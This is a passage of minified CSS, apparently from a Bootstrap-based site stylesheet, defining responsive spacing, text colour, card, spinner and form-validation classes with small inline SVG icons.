!important}.pl-lg-4,.px-lg-4{padding-left:1.5rem !important}.p-lg-5{padding:3rem !important}.pt-lg-5,.py-lg-5{padding-top:3rem !important}.pr-lg-5,.px-lg-5{padding-right:3rem !important}.pb-lg-5,.py-lg-5{padding-bottom:3rem !important}.pl-lg-5,.px-lg-5{padding-left:3rem !important}.p-lg-6{padding:5rem !important}.pt-lg-6,.py-lg-6{padding-top:5rem !important}.pr-lg-6,.px-lg-6{padding-right:5rem !important}.pb-lg-6,.py-lg-6{padding-bottom:5rem !important}.pl-lg-6,.px-lg-6{padding-left:5rem !important}.p-lg-7{padding:6rem !important}.pt-lg-7,.py-lg-7{padding-top:6rem !important}.pr-lg-7,.px-lg-7{padding-right:6rem !important}.pb-lg-7,.py-lg-7{padding-bottom:6rem !important}.pl-lg-7,.px-lg-7{padding-left:6rem !important}.m-lg-n1{margin:-0.25rem !important}.mt-lg-n1,.my-lg-n1{margin-top:-0.25rem !important}.mr-lg-n1,.mx-lg-n1{margin-right:-0.25rem !important}.mb-lg-n1,.my-lg-n1{margin-bottom:-0.25rem !important}.ml-lg-n1,.mx-lg-n1{margin-left:-0.25rem !important}.m-lg-n2{margin:-0.5rem !important}.mt-lg-n2,.my-lg-n2{margin-top:-0.5rem !important}.mr-lg-n2,.mx-lg-n2{margin-right:-0.5rem !important}.mb-lg-n2,.my-lg-n2{margin-bottom:-0.5rem !important}.ml-lg-n2,.mx-lg-n2{margin-left:-0.5rem !important}.m-lg-n3{margin:-1rem !important}.mt-lg-n3,.my-lg-n3{margin-top:-1rem !important}.mr-lg-n3,.mx-lg-n3{margin-right:-1rem !important}.mb-lg-n3,.my-lg-n3{margin-bottom:-1rem !important}.ml-lg-n3,.mx-lg-n3{margin-left:-1rem !important}.m-lg-n4{margin:-1.5rem !important}.mt-lg-n4,.my-lg-n4{margin-top:-1.5rem !important}.mr-lg-n4,.mx-lg-n4{margin-right:-1.5rem !important}.mb-lg-n4,.my-lg-n4{margin-bottom:-1.5rem !important}.ml-lg-n4,.mx-lg-n4{margin-left:-1.5rem !important}.m-lg-n5{margin:-3rem !important}.mt-lg-n5,.my-lg-n5{margin-top:-3rem !important}.mr-lg-n5,.mx-lg-n5{margin-right:-3rem !important}.mb-lg-n5,.my-lg-n5{margin-bottom:-3rem !important}.ml-lg-n5,.mx-lg-n5{margin-left:-3rem !important}.m-lg-n6{margin:-5rem !important}.mt-lg-n6,.my-lg-n6{margin-top:-5rem !important}.mr-lg-n6,.mx-lg-n6{margin-right:-5rem !important}.mb-lg-n6,.my-lg-n6{margin-bottom:-5rem !important}.ml-lg-n6,.mx-lg-n6{margin-left:-5rem !important}.m-lg-n7{margin:-6rem !important}.mt-lg-n7,.my-lg-n7{margin-top:-6rem !important}.mr-lg-n7,.mx-lg-n7{margin-right:-6rem !important}.mb-lg-n7,.my-lg-n7{margin-bottom:-6rem !important}.ml-lg-n7,.mx-lg-n7{margin-left:-6rem !important}.m-lg-auto{margin:auto !important}.mt-lg-auto,.my-lg-auto{margin-top:auto !important}.mr-lg-auto,.mx-lg-auto{margin-right:auto !important}.mb-lg-auto,.my-lg-auto{margin-bottom:auto !important}.ml-lg-auto,.mx-lg-auto{margin-left:auto !important}}@media(min-width: 1200px){.m-xl-0{margin:0 !important}.mt-xl-0,.my-xl-0{margin-top:0 !important}.mr-xl-0,.mx-xl-0{margin-right:0 !important}.mb-xl-0,.my-xl-0{margin-bottom:0 !important}.ml-xl-0,.mx-xl-0{margin-left:0 !important}.m-xl-1{margin:.25rem !important}.mt-xl-1,.my-xl-1{margin-top:.25rem !important}.mr-xl-1,.mx-xl-1{margin-right:.25rem !important}.mb-xl-1,.my-xl-1{margin-bottom:.25rem !important}.ml-xl-1,.mx-xl-1{margin-left:.25rem !important}.m-xl-2{margin:.5rem !important}.mt-xl-2,.my-xl-2{margin-top:.5rem !important}.mr-xl-2,.mx-xl-2{margin-right:.5rem !important}.mb-xl-2,.my-xl-2{margin-bottom:.5rem !important}.ml-xl-2,.mx-xl-2{margin-left:.5rem !important}.m-xl-3{margin:1rem !important}.mt-xl-3,.my-xl-3{margin-top:1rem !important}.mr-xl-3,.mx-xl-3{margin-right:1rem !important}.mb-xl-3,.my-xl-3{margin-bottom:1rem !important}.ml-xl-3,.mx-xl-3{margin-left:1rem !important}.m-xl-4{margin:1.5rem !important}.mt-xl-4,.my-xl-4{margin-top:1.5rem !important}.mr-xl-4,.mx-xl-4{margin-right:1.5rem !important}.mb-xl-4,.my-xl-4{margin-bottom:1.5rem !important}.ml-xl-4,.mx-xl-4{margin-left:1.5rem !important}.m-xl-5{margin:3rem !important}.mt-xl-5,.my-xl-5{margin-top:3rem !important}.mr-xl-5,.mx-xl-5{margin-right:3rem !important}.mb-xl-5,.my-xl-5{margin-bottom:3rem !important}.ml-xl-5,.mx-xl-5{margin-left:3rem !important}.m-xl-6{margin:5rem !important}.mt-xl-6,.my-xl-6{margin-top:5rem !important}.mr-xl-6,.mx-xl-6{margin-right:5rem !important}.mb-xl-6,.my-xl-6{margin-bottom:5rem !important}.ml-xl-6,.mx-xl-6{margin-left:5rem !important}.m-xl-7{margin:6rem !important}.mt-xl-7,.my-xl-7{margin-top:6rem !important}.mr-xl-7,.mx-xl-7{margin-right:6rem !important}.mb-xl-7,.my-xl-7{margin-bottom:6rem !important}.ml-xl-7,.mx-xl-7{margin-left:6rem !important}.p-xl-0{padding:0 !important}.pt-xl-0,.py-xl-0{padding-top:0 !important}.pr-xl-0,.px-xl-0{padding-right:0 !important}.pb-xl-0,.py-xl-0{padding-bottom:0 !important}.pl-xl-0,.px-xl-0{padding-left:0 !important}.p-xl-1{padding:.25rem !important}.pt-xl-1,.py-xl-1{padding-top:.25rem !important}.pr-xl-1,.px-xl-1{padding-right:.25rem !important}.pb-xl-1,.py-xl-1{padding-bottom:.25rem !important}.pl-xl-1,.px-xl-1{padding-left:.25rem !important}.p-xl-2{padding:.5rem !important}.pt-xl-2,.py-xl-2{padding-top:.5rem !important}.pr-xl-2,.px-xl-2{padding-right:.5rem !important}.pb-xl-2,.py-xl-2{padding-bottom:.5rem !important}.pl-xl-2,.px-xl-2{padding-left:.5rem !important}.p-xl-3{padding:1rem !important}.pt-xl-3,.py-xl-3{padding-top:1rem !important}.pr-xl-3,.px-xl-3{padding-right:1rem !important}.pb-xl-3,.py-xl-3{padding-bottom:1rem !important}.pl-xl-3,.px-xl-3{padding-left:1rem !important}.p-xl-4{padding:1.5rem !important}.pt-xl-4,.py-xl-4{padding-top:1.5rem !important}.pr-xl-4,.px-xl-4{padding-right:1.5rem !important}.pb-xl-4,.py-xl-4{padding-bottom:1.5rem !important}.pl-xl-4,.px-xl-4{padding-left:1.5rem !important}.p-xl-5{padding:3rem !important}.pt-xl-5,.py-xl-5{padding-top:3rem !important}.pr-xl-5,.px-xl-5{padding-right:3rem !important}.pb-xl-5,.py-xl-5{padding-bottom:3rem !important}.pl-xl-5,.px-xl-5{padding-left:3rem !important}.p-xl-6{padding:5rem !important}.pt-xl-6,.py-xl-6{padding-top:5rem !important}.pr-xl-6,.px-xl-6{padding-right:5rem !important}.pb-xl-6,.py-xl-6{padding-bottom:5rem !important}.pl-xl-6,.px-xl-6{padding-left:5rem !important}.p-xl-7{padding:6rem !important}.pt-xl-7,.py-xl-7{padding-top:6rem !important}.pr-xl-7,.px-xl-7{padding-right:6rem !important}.pb-xl-7,.py-xl-7{padding-bottom:6rem !important}.pl-xl-7,.px-xl-7{padding-left:6rem !important}.m-xl-n1{margin:-0.25rem !important}.mt-xl-n1,.my-xl-n1{margin-top:-0.25rem !important}.mr-xl-n1,.mx-xl-n1{margin-right:-0.25rem !important}.mb-xl-n1,.my-xl-n1{margin-bottom:-0.25rem !important}.ml-xl-n1,.mx-xl-n1{margin-left:-0.25rem !important}.m-xl-n2{margin:-0.5rem !important}.mt-xl-n2,.my-xl-n2{margin-top:-0.5rem !important}.mr-xl-n2,.mx-xl-n2{margin-right:-0.5rem !important}.mb-xl-n2,.my-xl-n2{margin-bottom:-0.5rem !important}.ml-xl-n2,.mx-xl-n2{margin-left:-0.5rem !important}.m-xl-n3{margin:-1rem !important}.mt-xl-n3,.my-xl-n3{margin-top:-1rem !important}.mr-xl-n3,.mx-xl-n3{margin-right:-1rem !important}.mb-xl-n3,.my-xl-n3{margin-bottom:-1rem !important}.ml-xl-n3,.mx-xl-n3{margin-left:-1rem !important}.m-xl-n4{margin:-1.5rem !important}.mt-xl-n4,.my-xl-n4{margin-top:-1.5rem !important}.mr-xl-n4,.mx-xl-n4{margin-right:-1.5rem !important}.mb-xl-n4,.my-xl-n4{margin-bottom:-1.5rem !important}.ml-xl-n4,.mx-xl-n4{margin-left:-1.5rem !important}.m-xl-n5{margin:-3rem !important}.mt-xl-n5,.my-xl-n5{margin-top:-3rem !important}.mr-xl-n5,.mx-xl-n5{margin-right:-3rem !important}.mb-xl-n5,.my-xl-n5{margin-bottom:-3rem !important}.ml-xl-n5,.mx-xl-n5{margin-left:-3rem !important}.m-xl-n6{margin:-5rem !important}.mt-xl-n6,.my-xl-n6{margin-top:-5rem !important}.mr-xl-n6,.mx-xl-n6{margin-right:-5rem !important}.mb-xl-n6,.my-xl-n6{margin-bottom:-5rem !important}.ml-xl-n6,.mx-xl-n6{margin-left:-5rem !important}.m-xl-n7{margin:-6rem !important}.mt-xl-n7,.my-xl-n7{margin-top:-6rem !important}.mr-xl-n7,.mx-xl-n7{margin-right:-6rem !important}.mb-xl-n7,.my-xl-n7{margin-bottom:-6rem !important}.ml-xl-n7,.mx-xl-n7{margin-left:-6rem !important}.m-xl-auto{margin:auto !important}.mt-xl-auto,.my-xl-auto{margin-top:auto !important}.mr-xl-auto,.mx-xl-auto{margin-right:auto !important}.mb-xl-auto,.my-xl-auto{margin-bottom:auto !important}.ml-xl-auto,.mx-xl-auto{margin-left:auto !important}}.stretched-link::after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;pointer-events:auto;content:"";background-color:rgba(0,0,0,0)}.text-monospace{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace !important}.text-justify{text-align:justify !important}.text-wrap{white-space:normal !important}.text-nowrap{white-space:nowrap !important}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.text-left{text-align:left !important}.text-right{text-align:right !important}.text-center{text-align:center !important}@media(min-width: 576px){.text-sm-left{text-align:left !important}.text-sm-right{text-align:right !important}.text-sm-center{text-align:center !important}}@media(min-width: 768px){.text-md-left{text-align:left !important}.text-md-right{text-align:right !important}.text-md-center{text-align:center !important}}@media(min-width: 992px){.text-lg-left{text-align:left !important}.text-lg-right{text-align:right !important}.text-lg-center{text-align:center !important}}@media(min-width: 1200px){.text-xl-left{text-align:left !important}.text-xl-right{text-align:right !important}.text-xl-center{text-align:center !important}}.text-lowercase{text-transform:lowercase !important}.text-uppercase{text-transform:uppercase !important}.text-capitalize{text-transform:capitalize !important}.font-weight-light{font-weight:300 !important}.font-weight-lighter{font-weight:lighter !important}.font-weight-normal{font-weight:400 !important}.font-weight-bold{font-weight:700 !important}.font-weight-bolder{font-weight:bolder !important}.font-italic{font-style:italic !important}.text-white{color:#fff !important}.text-primary{color:#1fbbff !important}a.text-primary:hover,a.text-primary:focus{color:#0092d2 !important}.text-secondary{color:#888 !important}a.text-secondary:hover,a.text-secondary:focus{color:#626262 !important}.text-success{color:#28a745 !important}a.text-success:hover,a.text-success:focus{color:#19692c !important}.text-info{color:#17a2b8 !important}a.text-info:hover,a.text-info:focus{color:#0f6674 !important}.text-warning{color:#ffc107 !important}a.text-warning:hover,a.text-warning:focus{color:#ba8b00 !important}.text-danger{color:#dc3545 !important}a.text-danger:hover,a.text-danger:focus{color:#a71d2a !important}.text-light{color:#fcf8f4 !important}a.text-light:hover,a.text-light:focus{color:#ecd2b8 !important}.text-dark{color:#343a40 !important}a.text-dark:hover,a.text-dark:focus{color:#121416 !important}.text-black{color:#000 !important}a.text-black:hover,a.text-black:focus{color:#000 !important}.text-darkgrey{color:#221f1f !important}a.text-darkgrey:hover,a.text-darkgrey:focus{color:#000 !important}.text-sublime{color:#2a303c !important}a.text-sublime:hover,a.text-sublime:focus{color:#0b0c0f !important}.text-neongreen{color:#2eda6b !important}a.text-neongreen:hover,a.text-neongreen:focus{color:#1c9f4b !important}.text-milka{color:#b996f7 !important}a.text-milka:hover,a.text-milka:focus{color:#8a4ff2 !important}.text-lightgray{color:#f9f9f9 !important}a.text-lightgray:hover,a.text-lightgray:focus{color:#d3d3d3 !important}.text-gradientyellow{color:#ffed2a !important}a.text-gradientyellow:hover,a.text-gradientyellow:focus{color:#ddca00 !important}.text-gradientblue{color:#c0fff8 !important}a.text-gradientblue:hover,a.text-gradientblue:focus{color:#74fff0 !important}.text-ftimes{color:#fff1e5 !important}a.text-ftimes:hover,a.text-ftimes:focus{color:#ffc899 !important}.text-planfree{color:#ffdabb !important}a.text-planfree:hover,a.text-planfree:focus{color:#ffb06f !important}.text-legalnotepad{color:#fef6d8 !important}a.text-legalnotepad:hover,a.text-legalnotepad:focus{color:#fce58d !important}.text-excel{color:#0f9d58 !important}a.text-excel:hover,a.text-excel:focus{color:#085731 !important}.text-changelog{color:#47525d !important}a.text-changelog:hover,a.text-changelog:focus{color:#262c32 !important}.text-pdfred{color:#e7505a !important}a.text-pdfred:hover,a.text-pdfred:focus{color:#ce1c28 !important}.text-mediumgrey{color:#c1c1c1 !important}a.text-mediumgrey:hover,a.text-mediumgrey:focus{color:#9b9b9b !important}.text-paypal{color:#009cde !important}a.text-paypal:hover,a.text-paypal:focus{color:#006692 !important}.text-newdarkgrey{color:#a6abad !important}a.text-newdarkgrey:hover,a.text-newdarkgrey:focus{color:#7e8588 !important}.text-body{color:#212529 !important}.text-muted{color:#6c757d !important}.text-black-50{color:rgba(0,0,0,.5) !important}.text-white-50{color:rgba(255,255,255,.5) !important}.text-hide{font:0/0 a;color:rgba(0,0,0,0);text-shadow:none;background-color:rgba(0,0,0,0);border:0}.text-decoration-none{text-decoration:none !important}.text-break{word-wrap:break-word !important}.text-reset{color:inherit !important}.visible{visibility:visible !important}.invisible{visibility:hidden !important}.card{position:relative;display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-color:#fff;background-clip:border-box;border:1px solid rgba(0,0,0,.125);border-radius:.25rem}.card>hr{margin-right:0;margin-left:0}.card>.list-group{border-top:inherit;border-bottom:inherit}.card>.list-group:first-child{border-top-width:0;border-top-left-radius:calc(0.25rem - 1px);border-top-right-radius:calc(0.25rem - 1px)}.card>.list-group:last-child{border-bottom-width:0;border-bottom-right-radius:calc(0.25rem - 1px);border-bottom-left-radius:calc(0.25rem - 1px)}.card-body{flex:1 1 auto;min-height:1px;padding:1.25rem}.card-title{margin-bottom:.75rem}.card-subtitle{margin-top:-0.375rem;margin-bottom:0}.card-text:last-child{margin-bottom:0}.card-link:hover{text-decoration:none}.card-link+.card-link{margin-left:1.25rem}.card-header{padding:.75rem 1.25rem;margin-bottom:0;background-color:rgba(0,0,0,.03);border-bottom:1px solid rgba(0,0,0,.125)}.card-header:first-child{border-radius:calc(0.25rem - 1px) calc(0.25rem - 1px) 0 0}.card-header+.list-group .list-group-item:first-child{border-top:0}.card-footer{padding:.75rem 1.25rem;background-color:rgba(0,0,0,.03);border-top:1px solid rgba(0,0,0,.125)}.card-footer:last-child{border-radius:0 0 calc(0.25rem - 1px) calc(0.25rem - 1px)}.card-header-tabs{margin-right:-0.625rem;margin-bottom:-0.75rem;margin-left:-0.625rem;border-bottom:0}.card-header-pills{margin-right:-0.625rem;margin-left:-0.625rem}.card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1.25rem}.card-img,.card-img-top,.card-img-bottom{flex-shrink:0;width:100%}.card-img,.card-img-top{border-top-left-radius:calc(0.25rem - 1px);border-top-right-radius:calc(0.25rem - 1px)}.card-img,.card-img-bottom{border-bottom-right-radius:calc(0.25rem - 1px);border-bottom-left-radius:calc(0.25rem - 1px)}.card-deck .card{margin-bottom:15px}@media(min-width: 576px){.card-deck{display:flex;flex-flow:row wrap;margin-right:-15px;margin-left:-15px}.card-deck .card{flex:1 0 0%;margin-right:15px;margin-bottom:0;margin-left:15px}}.card-group>.card{margin-bottom:15px}@media(min-width: 576px){.card-group{display:flex;flex-flow:row wrap}.card-group>.card{flex:1 0 0%;margin-bottom:0}.card-group>.card+.card{margin-left:0;border-left:0}.card-group>.card:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.card-group>.card:not(:last-child) .card-img-top,.card-group>.card:not(:last-child) .card-header{border-top-right-radius:0}.card-group>.card:not(:last-child) .card-img-bottom,.card-group>.card:not(:last-child) .card-footer{border-bottom-right-radius:0}.card-group>.card:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.card-group>.card:not(:first-child) .card-img-top,.card-group>.card:not(:first-child) .card-header{border-top-left-radius:0}.card-group>.card:not(:first-child) .card-img-bottom,.card-group>.card:not(:first-child) .card-footer{border-bottom-left-radius:0}}.card-columns .card{margin-bottom:.75rem}@media(min-width: 576px){.card-columns{column-count:3;column-gap:1.25rem;orphans:1;widows:1}.card-columns .card{display:inline-block;width:100%}}.accordion>.card{overflow:hidden}.accordion>.card:not(:last-of-type){border-bottom:0;border-bottom-right-radius:0;border-bottom-left-radius:0}.accordion>.card:not(:first-of-type){border-top-left-radius:0;border-top-right-radius:0}.accordion>.card>.card-header{border-radius:0;margin-bottom:-1px}@keyframes spinner-border{to{transform:rotate(360deg)}}.spinner-border{display:inline-block;width:2rem;height:2rem;vertical-align:text-bottom;border:.25em solid currentColor;border-right-color:rgba(0,0,0,0);border-radius:50%;animation:spinner-border .75s linear infinite}.spinner-border-sm{width:1rem;height:1rem;border-width:.2em}@keyframes spinner-grow{0%{transform:scale(0)}50%{opacity:1;transform:none}}.spinner-grow{display:inline-block;width:2rem;height:2rem;vertical-align:text-bottom;background-color:currentColor;border-radius:50%;opacity:0;animation:spinner-grow .75s linear infinite}.spinner-grow-sm{width:1rem;height:1rem}.form-control{display:block;width:100%;height:calc(1.5em + 0.75rem + 2px);padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;background-clip:padding-box;border:1px solid #ced4da;border-radius:.25rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media(prefers-reduced-motion: reduce){.form-control{transition:none}}.form-control::-ms-expand{background-color:rgba(0,0,0,0);border:0}.form-control:-moz-focusring{color:rgba(0,0,0,0);text-shadow:0 0 0 #495057}.form-control:focus{color:#495057;background-color:#fff;border-color:#9fe2ff;outline:0;box-shadow:0 0 0 .2rem rgba(31,187,255,.25)}.form-control::placeholder{color:#6c757d;opacity:1}.form-control:disabled,.form-control[readonly]{background-color:#e9ecef;opacity:1}input[type=date].form-control,input[type=time].form-control,input[type=datetime-local].form-control,input[type=month].form-control{appearance:none}select.form-control:focus::-ms-value{color:#495057;background-color:#fff}.form-control-file,.form-control-range{display:block;width:100%}.col-form-label{padding-top:calc(0.375rem + 1px);padding-bottom:calc(0.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label-lg{padding-top:calc(0.5rem + 1px);padding-bottom:calc(0.5rem + 1px);font-size:1.25rem;line-height:1.5}.col-form-label-sm{padding-top:calc(0.25rem + 1px);padding-bottom:calc(0.25rem + 1px);font-size:0.875rem;line-height:1.5}.form-control-plaintext{display:block;width:100%;padding:.375rem 0;margin-bottom:0;font-size:1rem;line-height:1.5;color:#212529;background-color:rgba(0,0,0,0);border:solid rgba(0,0,0,0);border-width:1px 0}.form-control-plaintext.form-control-sm,.form-control-plaintext.form-control-lg{padding-right:0;padding-left:0}.form-control-sm{height:calc(1.5em + 0.5rem + 2px);padding:.25rem .5rem;font-size:0.875rem;line-height:1.5;border-radius:.2rem}.form-control-lg{height:calc(1.5em + 1rem + 2px);padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}select.form-control[size],select.form-control[multiple]{height:auto}textarea.form-control{height:auto}.form-group{margin-bottom:1rem}.form-text{display:block;margin-top:.25rem}.form-row{display:flex;flex-wrap:wrap;margin-right:-5px;margin-left:-5px}.form-row>.col,.form-row>[class*=col-]{padding-right:5px;padding-left:5px}.form-check{position:relative;display:block;padding-left:1.25rem}.form-check-input{position:absolute;margin-top:.3rem;margin-left:-1.25rem}.form-check-input[disabled]~.form-check-label,.form-check-input:disabled~.form-check-label{color:#6c757d}.form-check-label{margin-bottom:0}.form-check-inline{display:inline-flex;align-items:center;padding-left:0;margin-right:.75rem}.form-check-inline .form-check-input{position:static;margin-top:0;margin-right:.3125rem;margin-left:0}.valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#28a745}.valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:0.875rem;line-height:1.5;color:#fff;background-color:rgba(40,167,69,.9);border-radius:.25rem}.was-validated :valid~.valid-feedback,.was-validated :valid~.valid-tooltip,.is-valid~.valid-feedback,.is-valid~.valid-tooltip{display:block}.was-validated .form-control:valid,.form-control.is-valid{border-color:#28a745;padding-right:calc(1.5em + 0.75rem);background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(0.375em + 0.1875rem) center;background-size:calc(0.75em + 0.375rem) calc(0.75em + 0.375rem)}.was-validated .form-control:valid:focus,.form-control.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.was-validated textarea.form-control:valid,textarea.form-control.is-valid{padding-right:calc(1.5em + 0.75rem);background-position:top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem)}.was-validated .custom-select:valid,.custom-select.is-valid{border-color:#28a745;padding-right:calc(0.75em + 2.3125rem);background:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px,url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e") #fff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem)}.was-validated .custom-select:valid:focus,.custom-select.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.was-validated .form-check-input:valid~.form-check-label,.form-check-input.is-valid~.form-check-label{color:#28a745}.was-validated .form-check-input:valid~.valid-feedback,.was-validated .form-check-input:valid~.valid-tooltip,.form-check-input.is-valid~.valid-feedback,.form-check-input.is-valid~.valid-tooltip{display:block}.was-validated .custom-control-input:valid~.custom-control-label,.custom-control-input.is-valid~.custom-control-label{color:#28a745}.was-validated .custom-control-input:valid~.custom-control-label::before,.custom-control-input.is-valid~.custom-control-label::before{border-color:#28a745}.was-validated .custom-control-input:valid:checked~.custom-control-label::before,.custom-control-input.is-valid:checked~.custom-control-label::before{border-color:#34ce57;background-color:#34ce57}.was-validated .custom-control-input:valid:focus~.custom-control-label::before,.custom-control-input.is-valid:focus~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.was-validated .custom-control-input:valid:focus:not(:checked)~.custom-control-label::before,.custom-control-input.is-valid:focus:not(:checked)~.custom-control-label::before{border-color:#28a745}.was-validated .custom-file-input:valid~.custom-file-label,.custom-file-input.is-valid~.custom-file-label{border-color:#28a745}.was-validated .custom-file-input:valid:focus~.custom-file-label,.custom-file-input.is-valid:focus~.custom-file-label{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#dc3545}.invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:0.875rem;line-height:1.5;color:#fff;background-color:rgba(220,53,69,.9);border-radius:.25rem}.was-validated :invalid~.invalid-feedback,.was-validated :invalid~.invalid-tooltip,.is-invalid~.invalid-feedback,.is-invalid~.invalid-tooltip{display:block}.was-validated .form-control:invalid,.form-control.is-invalid{border-color:#dc3545;padding-right:calc(1.5em + 0.75rem);background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(0.375em + 0.1875rem) center;background-size:calc(0.75em + 0.375rem) calc(0.75em + 0.375rem)}.was-validated .form-control:invalid:focus,.form-control.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + 0.75rem);background-position:top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem)}.was-validated .custom-select:invalid,.custom-select.is-invalid{border-color:#dc3545;padding-right:calc(0.75em + 2.3125rem);background:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px,url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e") #fff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem)}.was-validated .custom-select:invalid:focus,.custom-select.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.was-validated .form-check-input:invalid~.form-check-label,.form-check-input.is-invalid~.form-check-label{color:#dc3545}.was-validated .form-check-input:invalid~.invalid-feedback,.was-validated .form-check-input:invalid~.invalid-tooltip,.form-check-input.is-invalid~.invalid-feedback,.form-check-input.is-invalid~.invalid-tooltip{display:block}.was-validated .custom-control-input:invalid~.custom-control-label,.custom-control-input.is-invalid~.custom-control-label{color:#dc3545}.was-validated .custom-control-input:invalid~.custom-control-label::before,.custom-control-input.is-invalid~.custom-control-label::before{border-color:#dc3545}.was-validated .custom-control-input:invalid:checked~.custom-control-label::before,.custom-control-input.is-invalid:checked~.custom-control-label::before{border-color:#e4606d;background-color:#e4606d}.was-validated .custom-control-input:invalid:focus~.custom-control-label::before,.custom-control-input.is-invalid:focus~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.was-validated .custom-control-input:invalid:focus:not(:checked)~.custom-control-label::before,.custom-control-input.is-invalid:focus:not(:checked)~.custom-control-label::before{border-color:#dc3545}.was-validated .custom-file-input:invalid~.custom-file-label,.custom-file-input.is-invalid~.custom-file-label{border-color:#dc3545}.was-validated .custom-file-input:invalid:focus~.custom-file-label,.custom-file-input.is-invalid:focus~.custom-file-label{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.form-inline{display:flex;flex-flow:row wrap;align-items:center}.form-inline .form-check{width:100%}@media(min-width: 576px){.form-inline label{display:flex;align-items:center;justify-content:center;margin-bottom:0}.form-inline .form-group{display:flex;flex:0 0 auto;flex-flow:row wrap;align-items:center;margin-bottom:0}.form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.form-inline .form-control-plaintext{display:inline-block}.form-inline .input-group,.form-inline .custom-select{width:auto}.form-inline .form-check{display:flex;align-items:center;justify-content:center;width:auto;padding-left:0}.form-inline .form-check-input{position:relative;flex-shrink:0;margin-top:0;margin-right:.25rem;margin-left:0}.form-inline .custom-control{align-items:center;justify-content:center}.form-inline .custom-control-label{margin-bottom:0}}.custom-control{position:relative;display:block;min-height:1.5rem;padding-left:1.5rem}.custom-control-inline{display:inline-flex;margin-right:1rem}.custom-control-input{position:absolute;left:0;z-index:-1;width:1rem;height:1.25rem;opacity:0}.custom-control-input:checked~.custom-control-label::before{color:#fff;border-color:#1fbbff;background-color:#1fbbff}.custom-control-input:focus~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(31,187,255,.25)}.custom-control-input:focus:not(:checked)~.custom-control-label::before{border-color:#9fe2ff}.custom-control-input:not(:disabled):active~.custom-control-label::before{color:#fff;background-color:#d2f1ff;border-color:#d2f1ff}.custom-control-input[disabled]~.custom-control-label,.custom-control-input:disabled~.custom-control-label{color:#6c757d}.custom-control-input[disabled]~.custom-control-label::before,.custom-control-input:disabled~.custom-control-label::before{background-color:#e9ecef}.custom-control-label{position:relative;margin-bottom:0;vertical-align:top}.custom-control-label::before{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;pointer-events:none;content:"";background-color:#fff;border:#adb5bd solid 